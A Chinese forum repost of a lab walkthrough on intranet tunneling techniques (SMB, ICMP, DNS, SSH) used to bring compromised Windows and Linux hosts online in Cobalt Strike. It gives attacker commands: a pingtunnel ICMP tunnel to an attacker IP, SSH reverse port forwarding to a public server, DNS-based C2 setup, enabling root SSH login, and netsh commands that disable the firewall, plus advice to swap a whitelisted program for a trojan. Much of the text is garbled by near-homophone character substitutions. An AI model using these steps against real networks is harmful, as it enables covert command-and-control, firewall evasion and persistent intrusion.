IT评测·应用市场-qidao123.com技术社区

标题: 内网安全：隧道技术详解 [打印本页]

作者: 乌市泽哥 时间: 2024-7-13 12:10
标题: 内网安全：隧道技术详解
目次
隧道技术
反向连接技术
反向连接实验所用网络拓扑图及分析
网络分析
防火墙限定分析
实验条件分析
实战一：CS反向连接上线 - 拿下Win2008
一. 使用转发署理上线创建监听器
二. 上传后门执行上线
隧道技术 - SMB协议
SMB协议介绍
实战二：SMB协议搭建隧道正向连接 - 拿下win 2012
一. 生成SMB后门
二. 横向移动
三. 上线CS
隧道技术 - ICMP协议
关于ICMP协议
ICMP隧道搭建
一. 靶机TCP流量转发本地端口并封装进入ICMP协议
二. 取得TCP流量上线CS
隧道技术 - DNS协议
DNS协议
DNS协议搭建隧道网络拓扑图
实战三：DNS协议搭建隧道实验
一. 配置域名NS剖析
二 . 配置DNS监听器
三. 木马执行上线
增补：DNS协议通讯
隧道技术 - SSH协议
SSH协议
SSH协议搭建隧道网络拓扑图
实战四：SSH搭建隧道通讯
Linux：入站封走反向
Linux：出站封走正向
Linux上线CS办理办法
防火墙

本篇文章将介绍在内网攻防中的隧道技术。
  本篇涉及的隧道技术：
  ICMP，SMB，DNS，SSH
  通过这些协议搭建隧道可以办理流量出网的问题，如许做的利益就是可以把已得到权限的主机上线到MSF/CS上面实现长期化控制。

隧道技术

隧道技术是办理流量不出网的问题，利用可以出网的协议封装出网，它通过在原有的网络协议上封装和封装数据包，使得数据能够在两个网络之间进行传输。
隧道技术是一种网络通信的技术手段，用于在不同的网络之间创建安全、可靠的通信连接。它可以扩展网络、穿越防火墙和NAT、提供加密和安全性，是实现VPN等网络功能的紧张组成部门。
隧道穿越防火墙：在面临防火墙限定时，隧道技术可以资助绕过这些限定，使得内部网络能够与外部网络进行通信。它通过将数据封装在可通过防火墙的通信协议上进行传输，达到穿越限定的效果。
好比，防火墙出站设置严格，仅答应ICMP协议通过，我们可以把TCP协议的数据封装进入ICMP协议来出防火墙，实现流量出网。
隧道技术的两个作用

取得体系权限，搭建隧道实现流量出网，上线CS
创建通讯，通过隧道技术创建通讯，进行进一步的渗出

我们基本不需要关注第二种作用，因为这些在通讯上的应用每每都比较苛刻，紧张在网络这一块应用比较多，在内网安全测试中，紧张作用是通过隧道移交权限。
所以有必要声明，文中的实验环境的主机均是取得了体系权限
隧道技术对比署理技术：

署理技术办理了攻击机到内网的访问不到问题，创建通讯
隧道技术办理了被攻击机访问到攻击机的问题，完成上线

创建隧道的流程

判断可利用协议，检察主机上有没有可利用的协议去搭建隧道
使用可出网协议创建隧道

反向连接技术

在我得上一篇署理技术文章中：内网安全：署理技术详解_貌美不及玲珑心，贤妻扶我青云志的博客-CSDN博客
演示了正向连接技术实验，但是有粉丝朋友私信希望可以演示一下反向连接技术，那肯定是要安排！！！
有必要分析一下为什么不推荐使用反向连接的原因：
思量到在同等条件下，使用隧道技术来替换反向连接更良好，原因是使用隧道更加隐蔽也能达到上线的效果，而且这些协议搭建的隧道除了SMB协议基本都是反向连接的。

反向连接实验所用网络拓扑图及分析

网络分析

网段环境：Vmware配置网络

攻击机：47.94.236.117
靶机：
win 7：内网唯一可出网主机也可对内网192.168.11.* 网段主机进行通讯
192.168.1.119 （外网的出口）192.168.11.128（内网Vmware2）
win 10：内网主机流量不出网
192.168.11.129（内网Vmware2）192.168.22.130（内网Vmware3）
win 2008：内网主机流量不出网
192.168.22.131（内网Vmware3）192.168.33.129（内网Vmware4）
win 2012：内网主机流量不出网
192.168.33.130（内网Vmware4）
防火墙限定分析

在win 2008服务器上开启了防火墙，只答应 80 端口 TCP进行通讯
入站限定严格，不可访问外网

在win 2012服务器上开启防火墙，只答应访问打印机
入站限定严格，不可访问外网

实验条件分析

而且MSF/CS的木马走的都是TCP的协议，因为正向连接完全堵死！
在这张网络拓扑图中，我们已经取得win7,win10权限，接下来将紧张目的是拿下win2008 win 2012

实战一：CS反向连接上线 - 拿下Win2008

出站计谋宽松，可以选择TCP协议反向连接
一. 使用转发署理上线创建监听器

在CS上选择和win10的会话

设置监听器，IP-win10：192.168.22.130 PORT：4444

二. 上传后门执行上线

拓扑图

隧道技术 - SMB协议

起首，看到win2012入站严格，出站宽松，第一想法肯定是在Win2012上反向连接到win2018上上线CS。但是需要紧张到win2008的入站规则严格，从win2012上的流量走向win2008对win2008主机是正向的，是要触发入站规则的。
但是紧张到win2012的入站规则里面答应通过访问打印机，可以利用SMB协议创建正向连接来实现win2012流量出网
如何判断？
使用CS直接扫描对方网段的主机的445端口即可，留意在内网要别动静太大
SMB协议介绍

SMB（Server Message Block）协议是一种在盘算机网络中共享文件、打印机和其他资源的通信协议。它最初由微软开发，用于在局域网中的盘算机之间共享文件和资源，445端口运行

打印机共享：SMB协议支持打印机的共享，答应用户在网络中使用共享打印机进行打印操纵。通过SMB协议，用户可以连接到其他盘算机上的共享打印机，并发送打印任务进行打印。
文件共享：SMB协议答应盘算机之间共享文件和目次。通过SMB协议，用户可以在网络中访问其他盘算机上的共享文件夹，并进行文件的读取、写入和管理操纵。

检察win2012的网络连接信息 netstat -ano

445端口开放，开启了SMB服务

实战二：SMB协议搭建隧道正向连接 - 拿下win 2012

判断：进行网络扫描看看有没445端口开放
一. 生成SMB后门

创建监听器

生成后门

二. 横向移动

配置监听器

选择会话

三. 上线CS

拓扑图

这是通过横向移动拿下对方主机权限后搭建SMB协议隧道完成上线控制，通过SMB协议搭建的隧道完成对方流量出网，在CS处上线进行长期化控制。

隧道技术 - ICMP协议

判断：ping 命令走的就是ICMP协议
ICMP协议搭建隧道的实验在前面已经做过，可以参考我得这篇博客：
内网安全：初探隧道技术_貌美不及玲珑心，贤妻扶我青云志的博客-CSDN博客
关于ICMP协议

ICMP（Internet Control Message Protocol，互联网控制报文协议）是一种用于在IP网络中通报控制消息的协议。它是IP协议的一个增补，用于提供网络诊断、错误报告和网络管理等功能。以下是关于ICMP协议的一些紧张特点：

控制消息通报：ICMP协议紧张用于在网络中通报控制消息。这些消息可以用于报告错误、提供网络状态信息、请求和响应等。
错误报告：ICMP协议界说了多种错误报告消息，用于关照源主机或路由器发生的错误或问题。例如，目的不可达、超时、重定向等。
Ping和Traceroute：ICMP协议被广泛用于网络诊断工具，如Ping和Traceroute。Ping工具使用ICMP Echo Request和Echo Reply消息来测试主机之间的可达性和延迟。Traceroute工具利用ICMP Time Exceeded消息来跟踪数据包在网络中的路径。
路由选择：ICMP协议还包括用于路由选择的消息，如路由器发现和重定向消息。这些消息用于路由器之间的通信，以便更好地选择和更新网络路径。
报文格式：ICMP消息被封装在IP数据包中进行传输。ICMP报文包括一个固定的报头和一个可变长度的数据字段。报头包含消息范例、代码和校验和等字段。
安全性：ICMP协议的某些消息范例大概会被用于网络攻击，如Ping洪流攻击和ICMP重定向攻击。因此，在网络环境中应接纳适当的安全措施，如防火墙配置和流量过滤，以防止滥用和减少风险。

ICMP协议在互联网中扮演偏紧张的脚色，它提供了诊断和管理网络的本领，使得网络管理员能够监测和清除网络问题。同时，ICMP也为网络设备之间的通信提供了一种可靠的机制。

ICMP隧道搭建

一. 靶机TCP流量转发本地端口并封装进入ICMP协议

CS端配置两个监听器
监听器1：IP：127.0.0.1 PORT：6666
监听器2：IP：192.168.46.66 PORT：7777
使用监听器1生成后门，上传到靶机并执行
同时被攻击机执行这条指令

pingtunnel.exe -type client -l 127.0.0.1:6666 -s 192.168.46.66 -t 192.168.46.66:7777 -tcp 1 -noprint 1 -nolog 1

复制代码

靶时机把访问攻击机的TCP流量发到本身本地6666端口并封装进ICMP协议再进行发出

二. 取得TCP流量上线CS

攻击机上运行

./pingtunnel -type server

复制代码

先对收到的ICMP取出TCP流量，完成靶机上线CS！！！
工具地址：GitHub - esrrhs/pingtunnel: Pingtunnel is a tool that send TCP/UDP traffic over ICMP

隧道技术 - DNS协议

判断：nslookup www.baidu.com 能返会结果，分析DNS可以出网
DNS属于是应用层协议，但是DNS在不同环境下使用的协议不同
DNS在区域传输时使用TCP，域名剖析使用UDP
防火墙上禁用的是TCP，DNS协议搭建隧道利用的是域名剖析，所以使用的是UDP

DNS协议

DNS（Domain Name System，域名体系）是互联网上用于将域名（例如www.example.com）转换为对应的IP地址的协议。它充当了互联网的“电话簿”，提供了域名与IP地址之间的映射关系。
以下是关于DNS协议的一些紧张特点：

域名剖析：DNS协议的紧张功能是将用户提供的域名剖析为相应的IP地址。当用户在欣赏器中输入一个域名时，欣赏器会向本地DNS服务器发送DNS查询请求，然后逐级向上查询，直到找到与域名对应的IP地址。
分布式体系：DNS采用分布式的计划，环球范围内存在多个DNS服务器，分为根服务器、顶级域服务器、权势巨子域服务器和本地DNS服务器。这种分布式架构确保了查询的效率和可靠性。
查询范例：DNS支持不同范例的查询，包括最常见的A记录查询（将域名剖析为IPv4地址）和AAAA记录查询（将域名剖析为IPv6地址）。还有其他范例的记录，如CNAME记录（别名记录）、MX记录（邮件交换记录）等。
域名条理布局：DNS使用了域名条理布局，将域名划分为多个层级，以方便管理和查询。域名从右向左逐级划分，最右边的部门为顶级域（例如.com、.net），左边的部门依次为二级域、三级域，以此类推。
缓存：为了提高查询效率，DNS服务器会对查询结果进行缓存，将剖析结果保存一段时间。当再次查询相同的域名时，可以直接返回缓存的结果，而不需要重新查询。
DNSSEC：DNSSEC（DNS Security Extensions）是一种对DNS进行安全增强的扩展协议。它提供了对DNS查询和响应进行数字签名的机制，以防止DNS挟制和欺骗攻击。

DNS协议在互联网中扮演了紧张的脚色，它使得用户可以使用易记的域名访问网站，而不需要记住复杂的IP地址。同时，DNS也为互联网的安全性和可靠性提供了基础支持。

DNS协议搭建隧道网络拓扑图

实战三：DNS协议搭建隧道实验

原理

在进行DNS查询时，假如查询的域名不在DNS服务器本机的缓存中，就会访问互联网进行查询，然后返回结果。假如在互联网上有一台定制的服务器，那么依靠DNS协议即可进行数据包的交换。但其本诘责题是，预期的返回结果应该是一个IP地址，而究竟上不是一返回的可以是任意字符串，包括加密的 C&C指令 (管理僵尸网络进行APT攻击的指令)
一. 配置域名NS剖析

需要准备一个域名并配置两条NS剖析，NS剖析将子域名指定其它DNS剖析

当剖析ns1.whgojp.top域名就会让DNS剖析cs.whgojp.top，最终剖析为一个IP
这个IP是我们CS服务器的地址
二 . 配置DNS监听器

三. 木马执行上线

使用这个监听器生成后门，上传对方服务器并执行

点击进去输入命令，创建DNS接洽

上线CS

增补：DNS协议通讯

DNS协议也有在通讯方面的应用，但是个人感觉太鸡肋，因为实现DNS通讯需要权限，都有高权限了直接上线即可，还创建什么通讯。所以这种通讯在内网渗出没有什么代价，在内网穿透大概有些代价。

隧道技术 - SSH协议

CS上无法使用这个隧道技术进行上线，想要使得Linux上线需要使用别的工具。
但是SSH隧道在通讯上具有一定的意义

SSH协议

SSH（Secure Shell，安全外壳协议）是一种用于在不安全网络上安全地进行远程登录和数据传输的网络协议。它通过加密通信和身份验证机制，提供了保密性、完备性和身份认证等安全功能。以下是关于SSH协议的一些紧张特点：

远程登录：SSH协议最常见的用途是远程登录到远程盘算机体系上。通过SSH协议，用户可以在当土地算机上通过终端访问和操纵远程盘算机，就像直接在远程盘算机上操纵一样。
加密通信：SSH协议使用加密算法来掩护通信的秘密性和完备性。它通过对传输的数据进行加密，防止被第三方窃听和窜改。常见的加密算法包括AES、3DES、RC4等。
身份认证：SSH协议支持多种身份认证方式，例如基于密码的身份认证、公钥身份认证和证书身份认证等。公钥身份认证是最常用的方式，它使用公钥和私钥来实现身份验证和加密通信。
端口转发：SSH协议还支持端口转发功能，可以将当土地算机的某个端口映射到远程盘算机，从而实现本地和远程盘算机之间的安全通信。
文件传输：SSH协议提供了安全的文件传输功能，即SCP（Secure Copy）和SFTP（SSH File Transfer Protocol）。这些功能答应用户在当土地算机和远程盘算机之间传输文件，并确保传输过程的安全性。
X11转发：SSH协议支持X11图形界面的远程显示功能，答应用户在远程盘算机上运行图形应用程序，并将图形界面显示在当土地算机上。

SSH协议是一种广泛使用的安全协议，实用于远程管理、文件传输、远程终端访问等场景。它提供了强盛的安全性和可靠性，使得远程盘算机之间的通信变得更加安全和便捷。

SSH协议搭建隧道网络拓扑图

已经拿下了Linux主机的权限，借助Linux主机搭建SSH隧道探针Linux所在的内网

Linux开启SSH协议登录：

vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart

复制代码

实战四：SSH搭建隧道通讯

这个隧道搭建的意义就在于可以实现对内网的探针
Linux：入站封走反向

将本地访问1.16 8080端口的流量发给47.94.236.117 1234端口上

ssh -CfNg -R 1122:192.168.1.16:8080 root@47.94.236.117

复制代码

这个需要公网服务器的密码，利用条件很低

公网服务器访问本地1234端口

Linux：出站封走正向

将本地访问1.16 8080端口的流量转发至本地1122端口

ssh -CfNg -L 1122:192.168.1.16:8080 root@192.168.1.166

复制代码

在这台Linux上访问本地1122端口即可

Linux上线CS办理办法

项目地址：GitHub - gloxec/CrossC2: generate CobaltStrike's cross-platform payload
面向Linux Mac IOS Android体系上线支持
插件使用，命令使用
使用参考：https://gloxec.github.io/CrossC2/zh_cn/

下载对应版本加载器和CNA插件
上传加载器文件和本地加载CNA插件
修改CNA插件配置路径及上传Key文件
使用命令或插件绑定HTTPS监听器生成

根据CS服务体系范例选择插件，我的是Linux，下载Linux即可

上传至你的CS目次下

还有这两个文件，从CS客户端加载，在windows上加载

目前支持反向的HTTPS和正向的TCP

创建监听器

反向上线

在CS上有这个文件

生成后门，在system处可以选择体系

服务端生成后门文件

上线

通过程序进行上线，更方便一些

防火墙

当我们拿下服务器权限后，防火墙过滤极度严格，隧道不管用，还有办法，选择干掉防火墙。固然风险还是很大的。
可以直接关闭防火墙，删除规则，大概替换
建议尝试替换，动静较小，有的程序把本身放入白名单中，替换程序

可以把木马与程序进行替换

防火墙相关命令：

查看当前防火墙状态：netsh advfirewall show allprofiles
关闭防火墙：netsh advfirewall set allprofiles state off
开启防火墙：netsh advfirewall set allprofiles state on
恢复初始防火墙设置：netsh advfirewall reset
启用桌面防火墙: netsh advfirewall set allprofiles state on
设置默认输入和输出策略：netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound
如果设置为拒绝使用blockinbound,blockoutbound

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

欢迎光临 IT评测·应用市场-qidao123.com技术社区 (https://dis.qidao123.com/)